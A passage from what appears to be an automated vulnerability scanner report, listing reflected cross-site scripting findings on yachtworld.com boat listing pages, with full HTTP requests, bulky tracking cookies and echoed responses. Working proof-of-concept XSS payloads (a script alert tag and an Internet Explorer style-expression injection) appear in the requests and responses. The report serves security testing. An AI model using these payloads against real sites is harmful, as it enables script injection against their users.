VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:17:13 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 21:17:12 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
re/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Ricof752b"><script>alert(1)</script>40b5af5053c&boat_id=2152119">
...[SNIP]...

3.103. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 472fc"style%3d"x%3aexpression(alert(1))"b802179cd3d was submitted in the REST URL parameter 5. This input was echoed as 472fc"style="x:expression(alert(1))"b802179cd3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico472fc"style%3d"x%3aexpression(alert(1))"b802179cd3d HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:08 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:08 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
re/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico472fc"style="x:expression(alert(1))"b802179cd3d&boat_id=2152119">
...[SNIP]...

3.104. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 144cb"><script>alert(1)</script>523d00231bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico?144cb"><script>alert(1)</script>523d00231bb=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:51 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:51 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6